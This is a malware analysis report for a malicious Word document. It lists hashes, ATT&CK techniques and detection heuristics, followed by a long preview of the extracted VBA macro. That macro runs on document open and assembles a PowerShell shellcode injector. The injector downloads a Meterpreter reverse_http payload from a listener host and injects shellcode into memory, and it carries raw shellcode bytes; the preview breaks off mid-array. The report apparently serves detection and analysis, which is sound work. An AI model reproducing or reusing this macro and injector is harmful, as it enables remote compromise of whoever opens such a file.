Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6888c9130fab53c6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 84.5 KB
Created: 2017-10-21 22:15:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: c89e115dd9abb2acfb7aeaed42ab5eba
SHA-1: 74ab91b7dec21536c4f7ca2084b146421c0dfd11
SHA-256: 6888c9130fab53c64ebf2de9260123e3f64071e8409d91379c1b9d795c4123a5
Risk score: 666

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1087.001 Local Account

The sample contains multiple VBA macros designed to execute code, including references to PowerShell and WMI for process creation. The AutoOpen, Auto_Open, and Document_Open macros all call a function 'P', which appears to reassemble and execute a PowerShell script from concatenated string fragments (the reconstructed script defines an Invoke-Shellcode function). The reconstructed PowerShell command includes a reference to '192.168.1.29.1', which is likely the C2 server for a reverse HTTP Meterpreter payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests shellcode execution.

Heuristics (18)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption [critical] [CVE likely] (CVE_2007_3899)
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • ClamAV: Doc.Dropper.Donoff-5743532-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
  • Reference to WriteProcessMemory API [critical] (SC_STR_WRITEPROCESSMEMORY)
  • Reference to CreateRemoteThread API [critical] (SC_STR_CREATEREMOTETHREAD)
  • VBA macros detected [medium] [8 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Matched line in script:
            [Sy"
        jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
        jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
  • PowerShell reference in VBA [critical] (OLE_VBA_PS)
    Matched line in script:
               "
        jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
             "
  • VBA WMI Win32_Process launcher [critical] (OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script:
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  • GetObject call [high] (OLE_VBA_GETOBJ)
    Matched line in script:
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub AutoOpen()
        P
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Matched line in script:
    Sub Document_Open()
        P
  • Auto_Open macro [low] (OLE_VBA_AUTO)
    Matched line in script:
    Attribute VB_Customizable = True
    Sub Auto_Open()
        P
  • Reference to PowerShell [high] (SC_STR_POWERSHELL)
  • Reference to GetProcAddress API [high] (SC_STR_GETPROCADDRESS)
  • Reference to VirtualAlloc API [medium] (SC_STR_VIRTUALALLOC)
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 32119 bytes
SHA-256: 68e73dbc0fe17466fea2dad8c4ecb16be3304933b8ffa998b4450b19207117d4

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    P
End Sub

Sub AutoOpen()
    P
End Sub

Sub Document_Open()
    P
End Sub

Public Function P() As Variant
    Dim jC As String
    jC = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
    jC = jC + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
    jC = jC + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
    jC = jC + "    [ValidateNotNullOrEmpty()]"
    [UInt16]
    "
    jC = jC + "$ProcessID,"
    [Parameter( ParameterSetName = 'R"
    jC = jC + "unLocal' )]"
    [ValidateNotNullOrEmpty()]
    ["
    jC = jC + "Byte[]]"
    $Shellcode,
    [Parameter( Paramete"
    jC = jC + "rSetName = 'Metasploit' )]"
    [ValidateSet( 'win"
    jC = jC + "dows/meterpreter/reverse_http',"
                 "
    jC = jC + " 'windows/meterpreter/reverse_https',"
           "
    jC = jC + "       IgnoreCase = $True )]"
    [String]
    $P"
    jC = jC + "ayload = 'windows/meterpreter/reverse_http',"
    "
    jC = jC + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
    jC = jC + "    [Switch]"
    $ListMetasploitPayloads,
    [P"
    jC = jC + "arameter( Mandatory = $True,"
                Para ""
    jC = jC + "meterSetName = 'Metasploit' )]"
    [ValidateNotNu"
    jC = jC + "llOrEmpty()]"
    [String]
    $Lhost = '192.168.1.29."
    jC = jC + "1',"
    [Parameter( Mandatory = $True,
         "
    jC = jC + "       ParameterSetName = 'Metasploit' )]"
    [Va"
    jC = jC + "lidateRange( 1,65535 )]"
    [Int]
    $Lport = 80"
    jC = jC + "443,"
    [Parameter( ParameterSetName = 'Metasplo"
    jC = jC + "it' )]"
    [ValidateNotNull()]
    [String]
   "
    jC = jC + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
    jC = jC + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
    jC = jC + "ings').'User Agent',"
    [Parameter( ParameterSet"
    jC = jC + "Name = 'Metasploit' )]"
    [ValidateNotNull()]
 "
    jC = jC + "   [Switch]"
    $Legacy = $False,
    [Parameter"
    jC = jC + "( ParameterSetName = 'Metasploit' )]"
    [Validat"
    jC = jC + "eNotNull()]"
    [Switch]
    $Proxy = $False,
 "
    jC = jC + "   [Switch]"
    $Force = $False
)
    Set-Stric"
    jC = jC + "tMode -Version 2.0"
    if ($PsCmdlet.ParameterSet"
    jC = jC + "Name -eq 'ListPayloads')"
    {
        $Availabl"
    jC = jC + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
    jC = jC + "ers['Payload'].Attributes |"
            Where-Obj"
    jC = jC + "ect {$_.TypeId -eq [System.Management.Automation.V"
    jC = jC + "alidateSetAttribute]}"
        foreach ($Payload i"
    jC = jC + "n $AvailablePayloads.ValidValues)"
        {
    "
    jC = jC + "        New-Object PSObject -Property @{ Payloads "
    jC = jC + "= $Payload }"
        }
        Return
    }
  "
    jC = jC + "  if ( $PSBoundParameters['ProcessID'] )"
    {
 "
    jC = jC + "       Get-Process -Id $ProcessID -ErrorAction Sto"
    jC = jC + "p | Out-Null"
    }
    function Local:Get-Delega"
    jC = jC + "teType"
    {
        Param
        (
         "
    jC = jC + "   [OutputType([Type])]"
            [Parameter( P"
    jC = jC + "osition = 0)]"
            [Type[]]
            $"
    jC = jC + "Parameters = (New-Object Type[](0)),"
            "
    jC = jC + "[Parameter( Position = 1 )]"
            [Type]
 "
    jC = jC + "           $ReturnType = [Void]"
        )
      "
    jC = jC + "  $Domain = [AppDomain]::CurrentDomain"
        $D"
    jC = jC + "ynAssembly = New-Object System.Reflection.Assembly"
    jC = jC + "Name('ReflectedDelegate')"
        $AssemblyBuilde"
    jC = jC + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
    jC = jC + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
    jC = jC + ""
        $ModuleBuilder = $AssemblyBuilder.Define"
    jC = jC + "DynamicModule('InMemoryModule', $false)"
        $"
    jC = jC + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
    jC = jC + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
    jC = jC + "ss', [System.MulticastDelegate])"
        $Constru"
    jC = jC + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
    jC = jC + "ecialName, HideBySig, Public', [System.Reflection."
    jC = jC + "CallingConventions]::Standard, $Parameters)"
     "
    jC = jC + "   $ConstructorBuilder.SetImplementationFlags('Run"
    jC = jC + "time, Managed')"
        $MethodBuilder = $TypeBui"
    jC = jC + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
    jC = jC + "wSlot, Virtual', $ReturnType, $Parameters)"
      "
    jC = jC + "  $MethodBuilder.SetImplementationFlags('Runtime, "
    jC = jC + "Managed')"
        Write-Output $TypeBuilder.Creat"
    jC = jC + "eType()"
    }
    function Local:Get-ProcAddress"
    jC = jC + ""
    {
        Param
        (
            [Ou"
    jC = jC + "tputType([IntPtr])]"
            [Parameter( Posit"
    jC = jC + "ion = 0, Mandatory = $True )]"
            [String"
    jC = jC + "]"
            $Module,
            [Parameter( P"
    jC = jC + "osition = 1, Mandatory = $True )]"
            [St"
    jC = jC + "ring]"
            $Procedure
        )
        "
    jC = jC + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
    jC = jC + "semblies() |"
            Where-Object { $_.Global"
    jC = jC + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
    jC = jC + "als('System.dll') }"
        $UnsafeNativeMethods "
    jC = jC + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
    jC = jC + "ativeMethods')"
        $GetModuleHandle = $Unsafe"
    jC = jC + "NativeMethods.GetMethod('GetModuleHandle')"
      "
    jC = jC + "  $GetProcAddress = $UnsafeNativeMethods.GetMethod"
    jC = jC + "('GetProcAddress')"
        $Kern32Handle = $GetMo"
    jC = jC + "duleHandle.Invoke($null, @($Module))"
        $tmp"
    jC = jC + "Ptr = New-Object IntPtr"
        $HandleRef = New-"
    jC = jC + "Object System.Runtime.InteropServices.HandleRef($t"
    jC = jC + "mpPtr, $Kern32Handle)"
        Write-Output $GetPr"
    jC = jC + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
    jC = jC + "ervices.HandleRef]$HandleRef, $Procedure))"
    }
"
    jC = jC + ""
    function Local:Emit-CallThreadStub ([IntPtr] "
    jC = jC + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
    jC = jC + "ecture)"
    {
        $IntSizePtr = $Architectur"
    jC = jC + "e / 8"
        function Local:ConvertTo-LittleEndi"
    jC = jC + "an ([IntPtr] $Address)"
        {
            $Li"
    jC = jC + "ttleEndianByteArray = New-Object Byte[](0)"
      "
    jC = jC + "      $Address.ToString("X$($IntSizePtr*2)") -spli"
    jC = jC + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
    jC = jC + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
    jC = jC + ""
            [System.Array]::Reverse($LittleEndian"
    jC = jC + "ByteArray)"
            Write-Output $LittleEndian"
    jC = jC + "ByteArray"
        }
        $CallStub = New-Obje"
    jC = jC + "ct Byte[](0)"
        if ($IntSizePtr -eq 8)
    "
    jC = jC + "    {"
            [Byte[]] $CallStub = 0x48,0xB8 "
    jC = jC + "                     # MOV   QWORD RAX, &shellcode"
    jC = jC + ""
            $CallStub += ConvertTo-LittleEndian "
    jC = jC + "$BaseAddr       # &shellcode"
            $CallStu"
    jC = jC + "b += 0xFF,0xD0                              # CALL"
    jC = jC + "  RAX"
            $CallStub += 0x6A,0x00         "
    jC = jC + "                     # PUSH  BYTE 0"
            $"
    jC = jC + "CallStub += 0x48,0xB8                             "
    jC = jC + " # MOV   QWORD RAX, &ExitThread"
            $Call"
    jC = jC + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
    jC = jC + "ExitThread"
            $CallStub += 0xFF,0xD0    "
    jC = jC + "                          # CALL  RAX"
        }
"
    jC = jC + "        else"
        {
            [Byte[]] $Cal"
    jC = jC + "lStub = 0xB8                           # MOV   DWO"
    jC = jC + "RD EAX, &shellcode"
            $CallStub += Conve"
    jC = jC + "rtTo-LittleEndian $BaseAddr       # &shellcode"
  "
    jC = jC + "          $CallStub += 0xFF,0xD0                  "
    jC = jC + "            # CALL  EAX"
            $CallStub += "
    jC = jC + "0x6A,0x00                              # PUSH  BYT"
    jC = jC + "E 0"
            $CallStub += 0xB8                "
    jC = jC + "                   # MOV   DWORD EAX, &ExitThread"
"
    jC = jC + ""
            $CallStub += ConvertTo-LittleEndian $"
    jC = jC + "ExitThreadAddr # &ExitThread"
            $CallStu"
    jC = jC + "b += 0xFF,0xD0                              # CALL"
    jC = jC + "  EAX"
        }
        Write-Output $CallStub
"
    jC = jC + "    }"
    function Local:Inject-RemoteShellcode ("
    jC = jC + "[Int] $ProcessID)"
    {
        $hProcess = $Ope"
    jC = jC + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
    jC = jC + "ProcessAccessFlags.All (0x001F0FFF)"
        if (!"
    jC = jC + "$hProcess)"
        {
            Throw "Unable t"
    jC = jC + "o open a process handle for PID: $ProcessID"
    "
    jC = jC + "    }"
        $IsWow64 = $false
        if ($64b"
    jC = jC + "itCPU) # Only perform theses checks if CPU is 64-b"
    jC = jC + "it"
        {
            $IsWow64Process.Invoke("
    jC = jC + "$hProcess, [Ref] $IsWow64) | Out-Null"
           "
    jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
         "
    jC = jC + "   {"
                Throw 'Unable to inject 64-b"
    jC = jC + "it shellcode from within 32-bit Powershell. Use th"
    jC = jC + "e 64-bit version of Powershell if you want this to"
    jC = jC + " work.'"
            }
            elseif ($IsWow"
    jC = jC + "64) # 32-bit Wow64 process"
            {
       "
    jC = jC + "         if ($Shellcode32.Length -eq 0)"
         "
    jC = jC + "       {"
                    Throw 'No shellcode "
    jC = jC + "was placed in the $Shellcode32 variable!'"
       "
    jC = jC + "         }"
                $Shellcode = $Shellcod"
    jC = jC + "e32"
            }
            else # 64-bit proc"
    jC = jC + "ess"
            {
                if ($Shellcode"
    jC = jC + "64.Length -eq 0)"
                {
             "
    jC = jC + "       Throw 'No shellcode was placed in the $Shel"
    jC = jC + "lcode64 variable!'"
                }
           "
    jC = jC + "     $Shellcode = $Shellcode64"
            }
   "
    jC = jC + "     }"
        else # 32-bit CPU
        {
    "
    jC = jC + "        if ($Shellcode32.Length -eq 0)"
          "
    jC = jC + "  {"
                Throw 'No shellcode was place"
    jC = jC + "d in the $Shellcode32 variable!'"
            }
 "
    jC = jC + "           $Shellcode = $Shellcode32"
        }
 "
    jC = jC + "       $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
    jC = jC + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
    jC = jC + "000, 0x40) # (Reserve|Commit, RWX)"
        if (!$"
    jC = jC + "RemoteMemAddr)"
        {
            Throw "Unab"
    jC = jC + "le to allocate shellcode memory in PID: $ProcessID"
    jC = jC + ""
        }
        $WriteProcessMemory.Invoke($"
    jC = jC + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
    jC = jC + "ength, [Ref] 0) | Out-Null"
        $ExitThreadAdd"
    jC = jC + "r = Get-ProcAddress kernel32.dll ExitThread"
     "
    jC = jC + "   if ($IsWow64)"
        {
            $CallStub"
    jC = jC + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
    jC = jC + "ddr 32"
        }
        Else
        {
      "
    jC = jC + "      $CallStub = Emit-CallThreadStub $RemoteMemAd"
    jC = jC + "dr $ExitThreadAddr 64"
        }
        $RemoteS"
    jC = jC + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
    jC = jC + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
    jC = jC + "ve|Commit, RWX)"
        if (!$RemoteStubAddr)
  "
    jC = jC + "      {"
            Throw "Unable to allocate thr"
    jC = jC + "ead call stub memory in PID: $ProcessID"
        "
    jC = jC + "}"
        $WriteProcessMemory.Invoke($hProcess, $"
    jC = jC + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
    jC = jC + " 0) | Out-Null"
        $ThreadHandle = $CreateRem"
    jC = jC + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
    jC = jC + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
    jC = jC + "        if (!$ThreadHandle)"
        {
          "
    jC = jC + "  Throw "Unable to launch remote thread in PID: $P"
    jC = jC + "rocessID"
        }
        $CloseHandle.Invoke("
    jC = jC + "$hProcess) | Out-Null"
    }
    function Local:I"
    jC = jC + "nject-LocalShellcode"
    {
        if ($PowerShe"
    jC = jC + "ll32bit) {"
            if ($Shellcode32.Length -e"
    jC = jC + "q 0)"
            {
                Throw 'No she"
    jC = jC + "llcode was placed in the $Shellcode32 variable!'"
"
    jC = jC + "                return"
            }
           "
    jC = jC + " $Shellcode = $Shellcode32"
        }
        els ""
    jC = jC + "e"
        {
            if ($Shellcode64.Length "
    jC = jC + "-eq 0)"
            {
                Throw 'No s"
    jC = jC + "hellcode was placed in the $Shellcode64 variable!'"
    jC = jC + ""
                Return
            }
         "
    jC = jC + "   $Shellcode = $Shellcode64"
        }
        $"
    jC = jC + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
    jC = jC + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
    jC = jC + "ommit, RWX)"
        if (!$BaseAddress)
        {"
    jC = jC + ""
            Throw "Unable to allocate shellcode "
    jC = jC + "memory in PID: $ProcessID"
        }
        [Sy"
    jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
    jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
       "
    jC = jC + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
    jC = jC + "itThread"
        if ($PowerShell32bit)
        {"
    jC = jC + ""
            $CallStub = Emit-CallThreadStub $Bas"
    jC = jC + "eAddress $ExitThreadAddr 32"
        }
        el ""
    jC = jC + "se"
        {
            $CallStub = Emit-CallTh"
    jC = jC + "readStub $BaseAddress $ExitThreadAddr 64"
        "
    jC = jC + "}"
        $CallStubAddress = $VirtualAlloc.Invoke"
    jC = jC + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
    jC = jC + "0) # (Reserve|Commit, RWX)"
        if (!$CallStub"
    jC = jC + "Address)"
        {
            Throw "Unable to "
    jC = jC + "allocate thread call stub."
        }
        [S"
    jC = jC + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
    jC = jC + "Stub, 0, $CallStubAddress, $CallStub.Length)"
    "
    jC = jC + "    $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
    jC = jC + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
    jC = jC + "tr]::Zero)"
        if (!$ThreadHandle)
        {"
    jC = jC + ""
            Throw "Unable to launch thread."
  "
    jC = jC + "      }"
        $WaitForSingleObject.Invoke($Thre"
    jC = jC + "adHandle, 0xFFFFFFFF) | Out-Null"
        $Virtual"
    jC = jC + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
    jC = jC + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
     "
    jC = jC + "   $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
    jC = jC + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
    jC = jC + ")"
    }
    $IsWow64ProcessAddr = Get-ProcAddres"
    jC = jC + "s kernel32.dll IsWow64Process"
    if ($IsWow64Pro"
    jC = jC + "cessAddr)"
    {
        $IsWow64ProcessDelegate "
    jC = jC + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
    jC = jC + "e()) ([Bool])"
        $IsWow64Process = [System.R"
    jC = jC + "untime.InteropServices.Marshal]::GetDelegateForFun"
    jC = jC + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
    jC = jC + "elegate)"
        $64bitCPU = $true
    }
    el ""
    jC = jC + "se"
    {
        $64bitCPU = $false
    }
    "
    jC = jC + "if ([IntPtr]::Size -eq 4)"
    {
        $PowerSh"
    jC = jC + "ell32bit = $true"
    }
    Else
    {
        "
    jC = jC + "$PowerShell32bit = $false"
    }
    if ($PsCmdle"
    jC = jC + "t.ParameterSetName -eq 'Metasploit')"
    {
     "
    jC = jC + "   if (!$PowerShell32bit) {"
            $RootInvo"
    jC = jC + "cation = $MyInvocation.Line"
            $Response"
    jC = jC + " = $True"
            if ( $Force -or ( $Response "
    jC = jC + "= $psCmdlet.ShouldContinue( "Do you want to launch"
    jC = jC + " the payload from x86 Powershell?",
             "
    jC = jC + "      "Attempt to execute 32-bit shellcode from 64"
    jC = jC + "-bit Powershell. Note: This process takes about on"
    jC = jC + "e minute. Be patient! You will also see some artif"
    jC = jC + "acts of the script loading in the other process." "
    jC = jC + ") ) ) { }"
            if ( !$Response )
        "
    jC = jC + "    {"
                Return
            }
    "
    jC = jC + "        if ($MyInvocation.BoundParameters['Force']"
    jC = jC + ")"
            {
                $Command = "func"
    jC = jC + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
    jC = jC + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
    jC = jC + "ation)`n`n"
            }
            Else
    "
    jC = jC + "        {"
                $Command = "function $("
    jC = jC + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
    jC = jC + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
    jC = jC + "-Force`n`n"
            }
            $CommandBy"
    jC = jC + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
    jC = jC + "and)"
            $EncodedCommand = [Convert]::ToB"
    jC = jC + "ase64String($CommandBytes)"
            $Execute ="
    jC = jC + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
    jC = jC + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
    jC = jC + ""
            Invoke-Expression -Command $Execute |"
    jC = jC + " Out-Null"
            Return
        }
        "
    jC = jC + "$Response = $True"
        if ( $Force -or ( $Resp"
    jC = jC + "onse = $psCmdlet.ShouldContinue( "Do you know what"
    jC = jC + " you're doing?",
               "About to downloa"
    jC = jC + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
    jC = jC + ", LPORT=$($Lport)" ) ) ) { }
        if ( !$Respo"
    jC = jC + "nse )"
        {
            Return
        }
 "
    jC = jC + "       switch ($Payload)"
        {
            '"
    jC = jC + "windows/meterpreter/reverse_http'"
            {
"
    jC = jC + "                $SSL = ''"
            }
        "
    jC = jC + "    'windows/meterpreter/reverse_https'"
         "
    jC = jC + "   {"
                $SSL = 's'
                "
    jC = jC + "[System.Net.ServicePointManager]::ServerCertificat"
    jC = jC + "eValidationCallback = {$True}"
            }
    "
    jC = jC + "    }"
        if ($Legacy)
        {
         "
    jC = jC + "   $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
    jC = jC + "NITM"
        } else {
            $CharArray = "
    jC = jC + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
    jC = jC + "$_}"
            $SumTest = $False
            wh ""
    jC = jC + "ile ($SumTest -eq $False) "
            {
       "
    jC = jC + "         $GeneratedUri = $CharArray | Get-Random -"
    jC = jC + "Count 4"
                $SumTest = (([int[]] $Gen"
    jC = jC + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
    jC = jC + "2)"
            }
            $RequestUri = -join"
    jC = jC + " $GeneratedUri"
            $Request = "http$($SSL"
    jC = jC + ")://$($Lhost):$($Lport)/$($RequestUri)"
        "
    jC = jC + "}"
        $Uri = New-Object Uri($Request)
      "
    jC = jC + "  $WebClient = New-Object System.Net.WebClient"
  "
    jC = jC + "      $WebClient.Headers.Add('user-agent', "$UserA"
    jC = jC + "gent")
        if ($Proxy)
        {
          "
    jC = jC + "  $WebProxyObject = New-Object System.Net.WebProxy"
    jC = jC + ""
            $ProxyAddress = (Get-ItemProperty -P"
    jC = jC + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
    jC = jC + "on\Internet Settings').ProxyServer"
            if"
    jC = jC + " ($ProxyAddress) "
            {
                "
    jC = jC + "$WebProxyObject.Address = $ProxyAddress"
         "
    jC = jC + "       $WebProxyObject.UseDefaultCredentials = $Tr"
    jC = jC + "ue"
                $WebClientObject.Proxy = $WebP"
    jC = jC + "roxyObject"
            }
        }
        try
"
    jC = jC + ""
        {
            [Byte[]] $Shellcode32 = $W"
    jC = jC + "ebClient.DownloadData($Uri)"
        }
        ca ""
    jC = jC + "tch"
        {
            Throw "$($Error[0].Exc"
    jC = jC + "eption.InnerException.InnerException.Message)"
  "
    jC = jC + "      }"
        [Byte[]] $Shellcode64 = $Shellcod"
    jC = jC + "e32"
    }
    elseif ($PSBoundParameters['Shellc"
    jC = jC + "ode'])"
    {
        [Byte[]] $Shellcode32 = $Sh"
    jC = jC + "ellcode"
        [Byte[]] $Shellcode64 = $Shellcod"
    jC = jC + "e32"
    }
    Else
    {
        [Byte[]] $She"
    jC = jC + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
    jC = jC + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
     "
    jC = jC + "                             0x52,0x0c,0x8b,0x52,0"
    jC = jC + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
    jC = jC + "x31,0xc0,"
0                                  xac , ""
    jC = jC + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
    jC = jC + "0xc7,0xe2,0xf0,0x52,0x57,"
                       "
    jC = jC + "           0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
    jC = jC + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
       "
    jC = jC + "                           0xd0,0x50,0x8b,0x48,0x1"
    jC = jC + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
    jC = jC + "4,0x8b,"
                                  0x01,0x"
    jC = jC + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
    jC = jC + "c7,0x38,0xe0,0x75,0xf4,"
                         "
    jC = jC + "         0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
    jC = jC + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
         "
    jC = jC + "                         0x0c,0x4b,0x8b,0x58,0x1c,"
    jC = jC + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
    jC = jC + "0x24,"
                                  0x5b,0x5b"
    jC = jC + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
    jC = jC + ",0x12,0xeb,0x86,0x5d,"
                           "
    jC = jC + "       0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
    jC = jC + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
           "
    jC = jC + "                       0xbb,0xe0,0x1d,0x2a,0x0a,0x"
    jC = jC + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
    jC = jC + "0a,"
                                  0x80,0xfb,0"
    jC = jC + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
    jC = jC + "x53,0xff,0xd5,0x63,"
                             "
    jC = jC + "     0x61,0x6c,0x63,0x00)"
        [Byte[]] $Shell"
    jC = jC + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
    jC = jC + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
       "
    jC = jC + "                           0x56,0x48,0x31,0xd2,0x6"
    jC = jC + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
    jC = jC + "b,0x52,"
                                  0x20,0x"
    jC = jC + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
    jC = jC + "31,0xc9,0x48,0x31,0xc0,"
                         "
    jC = jC + "         0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
    jC = jC + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
         "
    jC = jC + "                         0x52,0x41,0x51,0x48,0x8b,"
    jC = jC + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
    jC = jC + "0x88,"
                                  0x00,0x00"
    jC = jC + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
    jC = jC + ",0x8b,0x48,0x18,0x44,"
                           "
    jC = jC + "       0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
    jC = jC + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
           "
    jC = jC + "                       0x01,0xd6,0x4d,0x31,0xc9,0x"
